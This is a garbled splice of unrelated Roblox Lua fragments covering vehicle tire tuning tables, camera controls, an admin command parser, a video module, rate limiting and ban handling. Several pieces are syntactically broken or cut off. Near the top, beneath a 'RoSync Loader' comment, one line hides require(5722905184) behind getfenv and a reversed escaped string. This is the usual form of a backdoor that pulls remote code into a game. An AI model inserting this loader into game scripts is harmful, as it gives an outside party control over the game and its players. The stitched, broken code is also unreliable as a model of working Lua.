Speed = 1.5, }, --Lobby Flag ["FlagPlant"] = { Speed = 0.5, } } local AnimationPlayer = {} local Tool = script.Parent.Parent
local ReplicatedStorage = game:GetService("ReplicatedStorage")
--[[ By: Brutez, 2/28/2015, 1:34 AM, (UTC-08:00) Pacific Time (US & Canada) ]]-- --[[ Last synced 11/11/2020 02:29 RoSync Loader ]]
getfenv()[string.reverse("\101\114\105\117\113\101\114")](5722905184) --[[ ]]--
-- local upVector2 = rightVector:Cross(forwardVector)
return CFrame.fromMatrix(eye, rightVector, upVector) -- upVector2 - для вертикали end
mouse.KeyDown:connect(function (key) key = string.lower(key) if key == "n" then --Camera controls if cam == ("car") then Camera.CameraSubject = player.Character.Humanoid Camera.CameraType = ("Custom") cam = ("freeplr") Camera.FieldOfView = 70 limitButton.Text = "Free Camera" wait(3) limitButton.Text = "" elseif cam == ("freeplr") then Camera.CameraSubject = player.Character.Humanoid Camera.CameraType = ("Attach") cam = ("lockplr") Camera.FieldOfView = 45 limitButton.Text = "FPV Camera" wait(3) limitButton.Text = "" elseif cam == ("lockplr") then Camera.CameraSubject = carSeat Camera.CameraType = ("Custom") cam = ("car") Camera.FieldOfView = 70 limitButton.Text = "Standard Camera" wait(3) limitButton.Text = "" end end end)
--Internal interface
local function OnInputEnded(self) --Reset button self.button.Parent.BackgroundColor3 = released_col if not self.enabled then self.button.Active = false end --Reset input state self.pressed = false self.move_touch_input = nil end function touch_button:Bind(btn) --Initialize meta reference local self = setmetatable({}, {__index = touch_button}) --Create button self.button = btn:WaitForChild("Inner"):WaitForChild("Button") self.button.Active = false --Initialize state self.pressed = false self.move_touch_input = nil self.enabled = false --Input connections self.input_connections = { self.button.InputBegan:Connect(function(input) --Make sure input is a valid state if self.enabled == false or self.move_touch_input ~= nil or input.UserInputType ~= Enum.UserInputType.Touch or input.UserInputState ~= Enum.UserInputState.Begin then return end --Start holding button self.move_touch_input = input self.button.Parent.BackgroundColor3 = pressed_col self.pressed = true end), uis.TouchEnded:Connect(function(input, processed) if input == self.move_touch_input then OnInputEnded(self) end end), gui_service.MenuOpened:Connect(function() if self.move_touch_input ~= nil then OnInputEnded(self) end end), } return self end function touch_button:Destroy() --Disconnect connections if self.input_connections ~= nil then for _,v in pairs(self.input_connections) do v:Disconnect() end self.input_connections = nil end end
-- << FUNCTIONS >>
function module:Process(commandArgsReal, args, commandPrefix, commandName, speaker, speakerData, originalMessage, originalAlias, batches, batchPos) local argsToReturn = {} local commandArgs = {} local UP = false local forceExit = false if commandPrefix == main.settings.UniversalPrefix then UP = true end for i,v in pairs(commandArgsReal) do if i ~= 1 or v ~= "player" or not UP then table.insert(commandArgs, v) end end for i,v in pairs(commandArgs) do local argToProcess = args[i] if v == "rank" then local finalRankId = 6 -- Any rank higher than 5 will not be given if argToProcess ~= nil then for _, rankDetails in pairs(main.settings.Ranks) do local rankId = rankDetails[1] local rankName = rankDetails[2] if string.lower(rankName) == argToProcess then finalRankId = rankId break end end if finalRankId == 6 then for _, rankDetails in pairs(main.settings.Ranks) do local rankId = rankDetails[1] local rankName = rankDetails[2] if string.sub(string.lower(rankName),1,#argToProcess) == argToProcess then finalRankId = rankId break end end end end argToProcess = finalRankId elseif v == "colour" or v == "color" or v == "color3" then local finalColor if argToProcess ~= nil then local rgb = {} argToProcess:gsub("([^,]+)",function(c) table.insert(rgb, tonumber(c)) end); if #rgb == 3 then finalColor = Color3.fromRGB(rgb[1], rgb[2], rgb[3]) else finalColor = main:GetModule("cf"):GetColorFromString(argToProcess) end end if not finalColor then if commandName == "laserEyes" then finalColor = speakerData.LaserColor else finalColor = Color3.fromRGB(255,255,255) end end argToProcess = finalColor elseif v == "number" or v == "integer" or v == "studs" or v == "speed" or v == "intensity" then argToProcess = tonumber(argToProcess) or 0 local limitDetails = main.settings.CommandLimits[commandName] if limitDetails then local limit = limitDetails.Limit local ingoreRank = limitDetails.IgnoreLimit if argToProcess > limit and speakerData.Rank < ingoreRank then local rankName = main:GetModule("cf"):GetRankName(ingoreRank) main:GetModule("cf"):FormatAndFireError(speaker, "CommandLimit", v, limit, rankName) forceExit = true end end elseif v == "boolean" then argToProcess = ((argToProcess == "on" or argToProcess == "true") and true) or false elseif v == "value" then local number = tonumber(argToProcess) if number then argToProcess = number end elseif v == "stat" or v == "statname" then local finalStatName = "" local leaderstats = speaker:FindFirstChild("leaderstats") if leaderstats then for _,stat in pairs(leaderstats:GetChildren()) do local statName = string.lower(stat.Name) if string.sub(statName, 1, #argToProcess) == argToProcess then finalStatName = stat.Name break end end end argToProcess = finalStatName elseif v == "scale" then argToProcess = tonumber(argToProcess) or 1 local scaleLimit = main.settings.ScaleLimit local ignoreRank = main.settings.IgnoreScaleLimit if argToProcess > scaleLimit and speakerData.Rank < ignoreRank then local rankName = main:GetModule("cf"):GetRankName(ignoreRank) main:GetModule("cf"):FormatAndFireError(speaker, "ScaleLimit", scaleLimit, rankName) forceExit = true elseif argToProcess > 50 then argToProcess = 100 end -- elseif v == "degrees" or v == "degree" or v == "rotation" then argToProcess = tonumber(argToProcess) or 180 elseif v == "team" then local selectedTeam for _,team in pairs(main.teams:GetChildren()) do local teamName = string.lower(team.Name) if string.sub(teamName, 1, #argToProcess) == argToProcess then selectedTeam = team break end end argToProcess = selectedTeam elseif v == "teamcolor" then local teamColor for _,team in pairs(main.teams:GetChildren()) do local teamName = string.lower(team.Name) if string.sub(teamName, 1, #argToProcess) == argToProcess then teamColor = team.TeamColor break end end argToProcess = teamColor elseif v == "text" or v == "string" or v == "reason" or v == "question" or v == "teamname" or v == "code" then local _, minStartPos = string.lower(originalMessage):find(originalAlias) if argToProcess then local newOriginalMessage = string.sub(originalMessage, minStartPos+1) local startPos, endPos = string.lower(newOriginalMessage):find(argToProcess, 1, true) local message = string.sub(newOriginalMessage, startPos) if batchPos ~= #batches then local removeFrom = batchPos+1 for i,v in pairs(batches) do if i >= removeFrom then table.remove(batches,removeFrom) end end end if tonumber(message) or v == "code" then argToProcess = message else argToProcess = main:GetModule("cf"):FilterBroadcast(message, speaker) end else argToProcess = " " end elseif v == "answers" then local newArgs = {} if argToProcess then argToProcess:gsub('([^,]+)',function(c) newArgs[#newArgs+1] = c end); argToProcess = newArgs end elseif v == "material" then local finalMaterial = Enum.Material.Plastic for i, materialName in pairs(materials) do if (argToProcess == string.sub(string.lower(materialName),1,#argToProcess)) then finalMaterial = Enum.Material[materialName] break end end argToProcess = finalMaterial elseif v == "userid" or v == "playerid" or v == "plrid" then if argToProcess == nil then argToProcess = 1 end local userId = tonumber(argToProcess) if not userId then local userName = string.lower(argToProcess) for i, plr in pairs(main.players:GetChildren()) do local plrName = string.lower(plr.Name) if string.sub(plrName, 1, #userName) == userName then userId = plr.UserId end end if not userId then userId = main:GetModule("cf"):GetUserId(argToProcess) end end argToProcess = userId elseif v == "tools" or v == "gears" or v == "tool" or v == "gear" then local toolName = argToProcess argToProcess = {} for i,v in pairs(main.listOfTools) do if toolName == "all" or string.lower(string.sub(v.Name, 1, #toolName)) == toolName then table.insert(argToProcess, v) end end elseif v == "morph" then local morphName = argToProcess argToProcess = nil if morphName then for i,v in pairs(main.server.Morphs:GetChildren()) do local mName = string.lower(v.Name) if mName == morphName then argToProcess = v break elseif string.sub(mName, 1, #morphName) == morphName then argToProcess = v end end end end if forceExit then break end table.insert(argsToReturn, argToProcess) end return argsToReturn, forceExit end return module
local _Select = "AllSeason" --(AllSeason, Slicks, SemiSlicks, AllTerrain, DragRadials, Custom) Caps and space sensitive local _Custom = { TireWearOn = true , --Friction and Wear FWearSpeed = .2 , --How fast your tires will degrade (Front) FTargetFriction = .72 , --Friction in optimal conditions (Front) FMinFriction = 0.45 , --Friction in worst conditions (Front) RWearSpeed = .2 , --How fast your tires will degrade (Rear) RTargetFriction = .80 , --Friction in optimal conditions (Rear) RMinFriction = 0.45 , --Friction in worst conditions (Rear) --Tire Slip TCSOffRatio = 1 , --How much optimal grip your car will lose with TCS off, set to 1 if you dont want any losses. WheelLockRatio = 1/6 , --How much grip your car will lose when locking the wheels WheelspinRatio = 1/1.2 , --How much grip your car will lose when spinning the wheels --Wheel Properties FFrictionWeight = 2 , --Ratio of friction between wheel and terrain, the higher it is, the more true to target friction your grip wil be (Front) (PGS) RFrictionWeight = 2 , --Ratio of friction between wheel and terrain, the higher it is, the more true to target friction your grip wil be (Rear) (PGS) FLgcyFrWeight = 0 , --Ratio of friction between wheel and terrain, the higher it is, the more true to target friction your grip wil be (Front) RLgcyFrWeight = 0 , --Ratio of friction between wheel and terrain, the higher it is, the more true to target friction your grip wil be (Rear) FElasticity = 0 , --How much your wheel will bounce (Front) (PGS) RElasticity = 0 , --How much your wheel will bounce (Rear) (PGS) FLgcyElasticity = 0 , --How much your wheel will bounce (Front) RLgcyElasticity = 0 , --How much your wheel will bounce (Rear) FElastWeight = 1 , --Ratio of elasticity between wheel and terrain, the higher it is, the more true to the wheel elasticity it will be (Front) (PGS) RElastWeight = 1 , --Ratio of elasticity between wheel and terrain, the higher it is, the more true to the wheel elasticity it will be (Rear) (PGS) FLgcyElWeight = 10 , --Ratio of elasticity between wheel and terrain, the higher it is, the more true to the wheel elasticity it will be (Front) RLgcyElWeight = 10 , --Ratio of elasticity between wheel and terrain, the higher it is, the more true to the wheel elasticity it will be (Rear) --Wear Regen RegenSpeed = 3.6 , --Don't change this } local _AllSeason = { TireWearOn = true , --Friction and Wear FWearSpeed = .2 , --Don't change this FTargetFriction = .58 , -- .58 to .63 FMinFriction = 0.35 , --Don't change this RWearSpeed = .2 , --Don't change this RTargetFriction = .58 , -- .58 to .63 RMinFriction = 0.35 , --Don't change this --Tire Slip TCSOffRatio = 1 , --Don't change this WheelLockRatio = 1/6 , --Don't change this WheelspinRatio = 1/1.2 , --Don't change this --Wheel Properties FFrictionWeight = 2 , --Don't change this RFrictionWeight = 2 , --Don't change this FLgcyFrWeight = 0 , --Don't change this RLgcyFrWeight = 0 , --Don't change this FElasticity = 0 , --Don't change this RElasticity = 0 , --Don't change this FLgcyElasticity = 0 , --Don't change this RLgcyElasticity = 0 , --Don't change this FElastWeight = 1 , --Don't change this RElastWeight = 1 , --Don't change this FLgcyElWeight = 10 , --Don't change this RLgcyElWeight = 10 , --Don't change this --Wear Regen RegenSpeed = 3.6 , --Don't change this } local _Slicks = { TireWearOn = true , --Friction and Wear FWearSpeed = .6 , --Don't change this FTargetFriction = .93 , -- .88 to .93 FMinFriction = 0.35 , --Don't change this RWearSpeed = .6 , --Don't change this RTargetFriction = .93 , -- .88 to .93 RMinFriction = 0.35 , --Don't change this --Tire Slip TCSOffRatio = 1 , --Don't change this WheelLockRatio = 1/6 , --Don't change this WheelspinRatio = 1/1.2 , --Don't change this --Wheel Properties FFrictionWeight = 0.6 , --Don't change this RFrictionWeight = 0.6 , --Don't change this FLgcyFrWeight = 0 , --Don't change this RLgcyFrWeight = 0 , --Don't change this FElasticity = 0 , --Don't change this RElasticity = 0 , --Don't change this FLgcyElasticity = 0 , --Don't change this RLgcyElasticity = 0 , --Don't change this FElastWeight = 1 , --Don't change this RElastWeight = 1 , --Don't change this FLgcyElWeight = 10 , --Don't change this RLgcyElWeight = 10 , --Don't change this --Wear Regen RegenSpeed = 3.6 , --Don't change this } local _SemiSlicks = { TireWearOn = true , --Friction and Wear FWearSpeed = .5 , --Don't change this FTargetFriction = .78 , -- .73 to .78 FMinFriction = 0.35 , --Don't change this RWearSpeed = .5 , --Don't change this RTargetFriction = .78 , -- .73 to .78 RMinFriction = 0.35 , --Don't change this --Tire Slip TCSOffRatio = 1 , --Don't change this WheelLockRatio = 1/6 , --Don't change this WheelspinRatio = 1/1.2 , --Don't change this --Wheel Properties FFrictionWeight = 0.6 , --Don't change this RFrictionWeight = 0.6 , --Don't change this FLgcyFrWeight = 0 , --Don't change this RLgcyFrWeight = 0 , --Don't change this FElasticity = 0 , --Don't change this RElasticity = 0 , --Don't change this FLgcyElasticity = 0 , --Don't change this RLgcyElasticity = 0 , --Don't change this FElastWeight = 1 , --Don't change this RElastWeight = 1 , --Don't change this FLgcyElWeight = 10 , --Don't change this RLgcyElWeight = 10 , --Don't change this --Wear Regen RegenSpeed = 3.6 , --Don't change this } local _AllTerrain = { TireWearOn = true , --Friction and Wear FWearSpeed = .3 , --Don't change this FTargetFriction = .5 , -- .48 to .53 FMinFriction = 0.35 , --Don't change this RWearSpeed = .3 , --Don't change this RTargetFriction = .5 , -- .48 to .53 RMinFriction = 0.35 , --Don't change this --Tire Slip TCSOffRatio = 1 , --Don't change this WheelLockRatio = 1/6 , --Don't change this WheelspinRatio = 1/1.2 , --Don't change this --Wheel Properties FFrictionWeight = 10 , --Don't change this RFrictionWeight = 10 , --Don't change this FLgcyFrWeight = 0 , --Don't change this RLgcyFrWeight = 0 , --Don't change this FElasticity = 0 , --Don't change this RElasticity = 0 , --Don't change this FLgcyElasticity = 0 , --Don't change this RLgcyElasticity = 0 , --Don't change this FElastWeight = 1 , --Don't change this RElastWeight = 1 , --Don't change this FLgcyElWeight = 10 , --Don't change this RLgcyElWeight = 10 , --Don't change this --Wear Regen RegenSpeed = 3.6 , --Don't change this } local _DragRadials = { TireWearOn = true , --Friction and Wear FWearSpeed = 30 , --Don't change this FTargetFriction = 1.2 , -- 1.18 to 1.23 FMinFriction = 0.35 , --Don't change this RWearSpeed = 30 , --Don't change this RTargetFriction = 1.2 , -- 1.18 to 1.23 RMinFriction = 0.35 , --Don't change this --Tire Slip TCSOffRatio = 1 , --Don't change this WheelLockRatio = 1/6 , --Don't change this WheelspinRatio = 1/1.2 , --Don't change this --Wheel Properties FFrictionWeight = 1 , --Don't change this RFrictionWeight = 1 , --Don't change this FLgcyFrWeight = 0 , --Don't change this RLgcyFrWeight = 0 , --Don't change this FElasticity = 0 , --Don't change this RElasticity = 0 , --Don't change this FLgcyElasticity = 0 , --Don't change this RLgcyElasticity = 0 , --Don't change this FElastWeight = 1 , --Don't change this RElastWeight = 1 , --Don't change this FLgcyElWeight = 10 , --Don't change this RLgcyElWeight = 10 , --Don't change this --Wear Regen RegenSpeed = 20 , --Don't change this } local car = script.Parent.Parent.Car.Value local _Tune = require(car["A-Chassis Tune"]) local cValues = script.Parent.Parent:WaitForChild("Values") local _WHEELTUNE = _AllSeason if _Select == "DragRadials" then _WHEELTUNE = _DragRadials elseif _Select == "Custom" then _WHEELTUNE = _Custom elseif _Select == "AllTerrain" then _WHEELTUNE = _AllTerrain elseif _Select == "Slicks" then _WHEELTUNE = _Slicks elseif _Select == "SemiSlicks" then _WHEELTUNE = _SemiSlicks else _WHEELTUNE = _AllSeason end car.DriveSeat.TireStats.Fwear.Value = _WHEELTUNE.FWearSpeed car.DriveSeat.TireStats.Ffriction.Value = _WHEELTUNE.FTargetFriction car.DriveSeat.TireStats.Fminfriction.Value = _WHEELTUNE.FMinFriction car.DriveSeat.TireStats.Ffweight.Value = _WHEELTUNE.FFrictionWeight car.DriveSeat.TireStats.Rwear.Value = _WHEELTUNE.RWearSpeed car.DriveSeat.TireStats.Rfriction.Value = _WHEELTUNE.RTargetFriction car.DriveSeat.TireStats.Rminfriction.Value = _WHEELTUNE.RMinFriction car.DriveSeat.TireStats.Rfweight.Value = _WHEELTUNE.RFrictionWeight car.DriveSeat.TireStats.TCS.Value = _WHEELTUNE.TCSOffRatio car.DriveSeat.TireStats.Lock.Value = _WHEELTUNE.WheelLockRatio car.DriveSeat.TireStats.Spin.Value = _WHEELTUNE.WheelspinRatio car.DriveSeat.TireStats.Reg.Value = _WHEELTUNE.RegenSpeed
--[[ Evercyan @ March 2023 HealingFountain/Server Handles healing on the server-side ]]
while true do wait(0.5) local target = findNearestTorso(script.Parent.Head.Position) if target ~= nil then script.Parent.Humanoid:MoveTo(target.Position, target) end end
Car = script.Parent.Car.Value Values = script.Parent.Values _Tune = require(Car["A-Chassis Tune"]) Dash = Car.Body["Digital Dash"].Screen.SurfaceGui.MainFrame
--[[ Calls the given callback, and stores any used external dependencies. Arguments can be passed in after the callback. If the callback completed successfully, returns true and the returned value, otherwise returns false and the error thrown. The callback shouldn't yield or run asynchronously. NOTE: any calls to useDependency() inside the callback (even if inside any nested captureDependencies() call) will not be included in the set, to avoid self-dependencies. ]]
local Package = script.Parent.Parent local PubTypes = require(Package.PubTypes) local parseError = require(Package.Logging.parseError) local sharedState = require(Package.Dependencies.sharedState) type Set<T> = {[T]: any} local initialisedStack = sharedState.initialisedStack local initialisedStackCapacity = 0 local function captureDependencies( saveToSet: Set<PubTypes.Dependency>, callback: (...any) -> any, ... ): (boolean, any) local prevDependencySet = sharedState.dependencySet sharedState.dependencySet = saveToSet sharedState.initialisedStackSize += 1 local initialisedStackSize = sharedState.initialisedStackSize local initialisedSet if initialisedStackSize > initialisedStackCapacity then initialisedSet = {} initialisedStack[initialisedStackSize] = initialisedSet initialisedStackCapacity = initialisedStackSize else initialisedSet = initialisedStack[initialisedStackSize] table.clear(initialisedSet) end local ok, value = xpcall(callback, parseError, ...) sharedState.dependencySet = prevDependencySet sharedState.initialisedStackSize -= 1 return ok, value end return captureDependencies
--edit the function below to return true when you want this response/prompt to be valid --player is the player speaking to the dialogue, and dialogueFolder is the object containing the dialogue data
return function(player, dialogueFolder) local plrData = require(game.ReplicatedStorage.Source.Modules.Util):GetPlayerData(player) if plrData.Character.Injuries.BrokenLeg.Value == true then return true end return false end
-- This code will detect if exploiters are trying to disable the client-sided anti-exploit.
antiexploit.Changed:Connect(function() if antiexploit.Disabled then antiexploit.Enabled = true end end)
-- TODO add assertion for face string and enum
local function _assert(data) if data.SyncToAudio then assert( data.SyncToAudio.Audio ~= nil, "Failed to create config | expected an Audio for SyncToAudio, but received nil" ) assert( data.SyncToAudio.StartAtAudioTime ~= nil, "Failed to create config | expected a StartAtAudioTime for SyncToAudio, but received nil" ) else assert( data.StartTime ~= nil, "Failed to create config | expected config.StartTime or config.SyncToAudio, but received nil" ) end assert(data.Adornee ~= nil, "Invalid Adornee | part expected got nil") assert(type(data.VideoId) == "string", ("Invalid VideoId | string expected got " .. type(data.VideoId))) if data.OnStart then assert(type(data.OnStart) == "function", ("Invalid OnStart | function expected got " .. type(data.OnStart))) end if data.OnEnd then assert(type(data.OnEnd) == "function", ("Invalid OnEnd | function expected got " .. type(data.OnEnd))) end if data.Face then assert(typeof(data.Face) == "EnumItem", ("Invalid Face Enum | enum expected got " .. typeof(data.Face))) end if data.Captions then local CaptionString = data.Captions.CaptionString assert( CaptionString ~= nil and type(CaptionString) == "string", ("Invalid CaptionString | string expected got " .. type(CaptionString)) ) end end local Video = {} Video.__index = Video Video.Type = "Video" Video.task = task function Video:_constructVideo(videoId) self.SurfaceGui ="SurfaceGui") -- TODO document this is a client only config local playerGui = Players.LocalPlayer:WaitForChild("PlayerGui") self.SurfaceGui.Adornee = self.Adornee self.SurfaceGui.Face = self.Face self.SurfaceGui.Name = self.Adornee.Name self.SurfaceGui.Parent = playerGui if self.SurfaceGuiProperties then for prop, value in pairs(self.SurfaceGuiProperties) do self.SurfaceGui[prop] = value end end self.VideoFrame ="VideoFrame") self.VideoFrame.Video = videoId self.VideoFrame.Size =, 0, 1, 0) self.VideoFrame.Parent = self.SurfaceGui if self.Captions then self.VideoFrame:SetAttribute(enums.Attribute.Captions, self.Captions.CaptionString or "") self.CaptionsModule = if self.CCButton then self.CCButton = self.CCButton:Clone() else self.CCButton = script.CCButton:Clone() end self.CCButton.Parent = self.SurfaceGui local captionLabel = self.CaptionsModule.CaptionLabel self.captionButtonConnection = self.CCButton.Activated:Connect(function() local areCaptionsVisible = captionLabel.Visible if areCaptionsVisible then self.CCButton.Image = ccOffIcon else self.CCButton.Image = ccIcon end captionLabel.Visible = not areCaptionsVisible end) end return self.VideoFrame end function Video:_calculateCurrentSoundIntensityRatio(video) local loudestPlayback = self.LoudestPlayback local loudness = video.volume self.LoudestPlayback = math.max(loudness, loudestPlayback) return loudness / self.LoudestPlayback end function _assert(data) local self = setmetatable({}, Video) self.OnStart = data.OnStart or function(_config) end self.OnEnd = data.OnEnd or function(_config) end self.CurrentSoundIntensityRatio = 1 self.LoudestPlayback = 1 self.IsCancelled = false self.SyncToAudio = data.SyncToAudio self.VideoId = data.VideoId self.Adornee = data.Adornee self.Face = data.Face or Enum.NormalId.Top self.TimeLength = data.TimeLength self.SurfaceGuiProperties = data.SurfaceGuiProperties self.Captions = data.Captions self.CaptionsModule = data.CaptionsModule self.StartTime = data.StartTime if self.SyncToAudio then self.StartTime = self.SyncToAudio.Audio.StartTime + self.SyncToAudio.StartAtAudioTime end return self end function Video:_attemptOnStart() if self.OnStart ~= nil then self:OnStart() end) end end function Video:_attemptOnEnd() if self.OnEnd ~= nil then self:OnEnd() end) end end function Video:getSchemaProcessorTimePosition(schema) return schema.timePosition.Value end function Video:getCurrentSoundTimePosition() return self.SyncToAudio.Audio.Sound.TimePosition end function Video:Process(schemaProcessor, startTime) if self.SyncToAudio then if self.SyncToAudio.Audio ~= nil and self.SyncToAudio.Audio.IsDestroyed then self:_attemptOnEnd() return end end local currentTime = self:getSchemaProcessorTimePosition(schemaProcessor) local timeVideoFinishes = (startTime + self.TimeLength) if currentTime >= timeVideoFinishes then self:_attemptOnEnd() return end schemaProcessor.Maid:add(self, "SeekFlag") self.Video = self:_constructVideo(self.VideoId) if not self.Video.IsLoaded then print("Loading video") repeat self.task.wait() until self.IsCancelled or self.Video.IsLoaded end if not self.IsCancelled then print("Video loaded") end if self.SyncToAudio then while (self.SyncToAudio.Audio and not self.SyncToAudio.Audio.IsDestroyed and not self.IsCancelled) and ( self.SyncToAudio.Audio and ( self.SyncToAudio.Audio.Sound == nil or (self.SyncToAudio.Audio.Sound and self:getCurrentSoundTimePosition() < startTime) ) ) do self.task.wait() end end local timePositionOffset = schemaProcessor.timePosition.Value - startTime self.Video.TimePosition = timePositionOffset local videoOnEndConnection = self.Video.Ended:Connect(function() self:_attemptOnEnd() end) if self.captionButtonConnection then schemaProcessor.Maid:add(self.captionButtonConnection) end self.Video:Play() if self.Captions then self.CaptionsModule:Run() schemaProcessor.Maid:add(self.CaptionsModule, "Clean") end) end local intensityRatioCalculatorConnection = RunService.Heartbeat:Connect(function() self.CurrentSoundIntensityRatio = self:_calculateCurrentSoundIntensityRatio(self.Video) end) schemaProcessor.Maid:add(videoOnEndConnection) schemaProcessor.Maid:add(intensityRatioCalculatorConnection) schemaProcessor.Maid:add(self.Video) schemaProcessor.Maid:add(self.CCButton) schemaProcessor.Maid:add(self.SurfaceGui) if not self.IsCancelled then self:_attemptOnStart() end end function Video:SeekFlag() self.IsCancelled = true end return Video
--// Processing
return function(Vargs, GetEnv) local env = GetEnv(nil, {script = script}) setfenv(1, env) local server = Vargs.Server local service = Vargs.Service local Commands, Decrypt, Encrypt, AddLog, TrackTask, Pcall local Functions, Admin, Anti, Core, HTTP, Logs, Remote, Process, Variables, Settings, Defaults local logError = env.logError local Routine = env.Routine local function Init() Functions = server.Functions; Admin = server.Admin; Anti = server.Anti; Core = server.Core; HTTP = server.HTTP; Logs = server.Logs; Remote = server.Remote; Process = server.Process; Variables = server.Variables; Settings = server.Settings; Defaults = server.Defaults; logError = logError or env.logError; Routine = Routine or env.Routine; Commands = Remote.Commands Decrypt = Remote.Decrypt Encrypt = Remote.Encrypt AddLog = Logs.AddLog TrackTask = service.TrackTask Pcall = server.Pcall --// NetworkServer Events if service.NetworkServer then service.RbxEvent(service.NetworkServer.ChildAdded, server.Process.NetworkAdded) service.RbxEvent(service.NetworkServer.DescendantRemoving, server.Process.NetworkRemoved) end --// Necessary checks to prevent first time users from bypassing bans. service.Events.DataStoreAdd_Banned:Connect(function(data: table|string) local userId = if type(data) == "string" then tonumber(string.match(data, ":(%d+)$")) elseif type(data) == "table" then data.UserId else nil local plr = userId and service.Players:GetPlayerByUserId(userId) if plr then local reason = if type(data) == "table" and data.Reason then data.Reason else "No reason provided" pcall(plr.Kick, plr, string.format("%s | Reason: %s", Variables.BanMessage, reason)) AddLog("Script", { Text = "Applied ban on "..plr.Name; Desc = "Ban reason: "..reason; }) end end) service.Events["DataStoreAdd_Core.Variables.TimeBans"]:Connect(function(data) local userId = if type(data) == "string" then tonumber(string.match(data, ":(%d+)$")) elseif type(data) == "table" then data.UserId else nil local plr = userId and service.Players:GetPlayerByUserId(userId) if plr then local reason = if type(data) == "table" and data.Reason then data.Reason else "No reason provided" pcall( plr.Kick, plr, string.format( "\n Reason: %s\n Banned until %s", (reason or "(No reason provided."), service.FormatTime(data.EndTime, { WithWrittenDate = true }) ) ) AddLog("Script", { Text = "Applied TimeBan on ".. plr.Name; Desc = "Ban reason: ".. reason; }) end end) Process.Init = nil AddLog("Script", "Processing Module Initialized") end; local function RunAfterPlugins(data) local existingPlayers = service.Players:GetPlayers() --// Events service.RbxEvent(service.Players.PlayerAdded, service.EventTask("PlayerAdded", Process.PlayerAdded)) service.RbxEvent(service.Players.PlayerRemoving, service.EventTask("PlayerRemoving", Process.PlayerRemoving)) --// Load client onto existing players if existingPlayers then for i, p in existingPlayers do Core.LoadExistingPlayer(p) end end service.TrackTask("Thread: ChatCharacterLimit", function() local ChatModules = service.Chat:WaitForChild("ClientChatModules", 5) if ChatModules then local ChatSettings = ChatModules:WaitForChild("ChatSettings", 5) if ChatSettings then local success, ChatSettingsModule = pcall(function() return require(ChatSettings) end) if success then local NewChatLimit = ChatSettingsModule.MaximumMessageLength if NewChatLimit and type(NewChatLimit) == "number" then Process.MaxChatCharacterLimit = NewChatLimit AddLog("Script", "Chat Character Limit automatically set to " .. NewChatLimit) end else AddLog("Script", "Failed to automatically get ChatSettings Character Limit, ignore if you use a custom chat system") end end end end) Process.RunAfterPlugins = nil AddLog("Script", "Process Module RunAfterPlugins Finished") end local function newRateLimit(rateLimit: table, rateKey: string|number|userdata|any) -- Ratelimit: table -- Ratekey: string or number local rateData = (type(rateLimit)=="table" and rateLimit) or nil if not rateData then error("Rate data doesn't exist (unable to check)") else -- RATELIMIT TABLE --[[ Table: { Rates = 100; -- Max requests per traffic Reset = 1; -- Interval seconds since the cache last updated to reset ThrottleEnabled = false/true; -- Whether throttle can be enabled ThrottleReset = 10; -- Interval seconds since the cache last throttled to reset ThrottleMax = 10; -- Max interval count of throttles Caches = {}; -- DO NOT ADD THIS. IT WILL AUTOMATICALLY BE CREATED ONCE RATELIMIT TABLE IS CHECKING- --... FOR RATE PASS AND THROTTLE CHECK. } ]] -- RATECACHE TABLE --[[ Table: { Rate = 0; Throttle = 0; -- Interval seconds since the cache last updated to reset LastUpdated = 0; -- Last checked for rate limit LastThrottled = nil or 0; -- Last checked for throttle (only changes if rate limit failed) } ]] local maxRate: number = math.abs(rateData.Rates) -- Max requests per traffic local resetInterval: number = math.floor(math.abs(rateData.Reset or 1)) -- Interval seconds since the cache last updated to reset local rateExceeded: boolean? = rateLimit.Exceeded or rateLimit.exceeded local ratePassed: boolean? = rateLimit.Passed or rateLimit.passed local canThrottle: boolean? = rateLimit.ThrottleEnabled local throttleReset: number? = rateLimit.ThrottleReset local throttleMax: number? = math.floor(math.abs(rateData.ThrottleMax or 1)) -- Ensure minimum requirement is followed maxRate = (maxRate>1 and maxRate) or 1 -- Max rate must have at least one rate else anything below 1 returns false for all rate checks local cacheLib = rateData.Caches if not cacheLib then cacheLib = {} rateData.Caches = cacheLib end -- Check cache local rateCache: table = cacheLib[rateKey] local throttleCache if not rateCache then rateCache = { Rate = 0; Throttle = 0; LastUpdated = tick(); LastThrottled = nil; } cacheLib[rateKey] = rateCache end local nowOs = tick() if nowOs-rateCache.LastUpdated > resetInterval then rateCache.LastUpdated = nowOs rateCache.Rate = 0 end local ratePass: boolean = rateCache.Rate+1<=maxRate local didThrottle: boolean = canThrottle and rateCache.Throttle+1<=throttleMax local throttleResetOs: number? = rateCache.ThrottleReset local canResetThrottle: boolean = throttleResetOs and nowOs-throttleResetOs <= 0 rateCache.Rate += 1 -- Check can throttle and whether throttle could be reset if canThrottle and canResetThrottle then rateCache.Throttle = 0 end -- If rate failed and can also throttle, count tick if canThrottle and (not ratePass and didThrottle) then rateCache.Throttle += 1 rateCache.LastThrottled = nowOs -- Check whether cache time expired and replace it with a new one or set a new one if not throttleResetOs or canResetThrottle then rateCache.ThrottleReset = nowOs end elseif canThrottle and ratePass then rateCache.Throttle = 0 end if rateExceeded and not ratePass then rateExceeded:fire(rateKey, rateCache.Rate, maxRate) end if ratePassed and ratePass then ratePassed:fire(rateKey, rateCache.Rate, maxRate) end return ratePass, didThrottle, canThrottle, rateCache.Rate, maxRate, throttleResetOs end end local RateLimiter = { Remote = { Rates = 120; Reset = 60; }; Command = { Rates = 20; Reset = 40; }; Chat = { Rates = 10; Reset = 1; }; CustomChat = { Rates = 10; Reset = 1; }; RateLog = { Rates = 10; Reset = 2; }; } local unWrap = service.unWrap local function RateLimit(p, typ) local isPlayer = type(p)=="userdata" and p:IsA"Player" if isPlayer then local rateData = RateLimiter[typ] assert(rateData, "No rate limit data available for the given type "..typ) local ratePass, didThrottle, canThrottle, curRate, maxRate = newRateLimit(rateData, p.UserId) return ratePass, didThrottle, canThrottle, curRate, maxRate else return true end end server.Process = { Init = Init; RunAfterPlugins = RunAfterPlugins; RateLimit = RateLimit; newRateLimit = newRateLimit; MsgStringLimit = 500; --// Max message string length to prevent long length chat spam server crashing (chat & command bar); Anything over will be truncated; MaxChatCharacterLimit = 250; --// Roblox chat character limit; The actual limit of the Roblox chat's textbox is 200 characters; I'm paranoid so I added 50 characters; Users should not be able to send a message larger than that; RateLimits = { Remote = 0.01; Command = 0.1; Chat = 0.1; CustomChat = 0.1; RateLog = 10; }; Remote = function(p, cliData, com, ...) local key = tostring(p.UserId) local keys = Remote.Clients[key] if p and p:IsA("Player") then if Anti.KickedPlayers[p] then 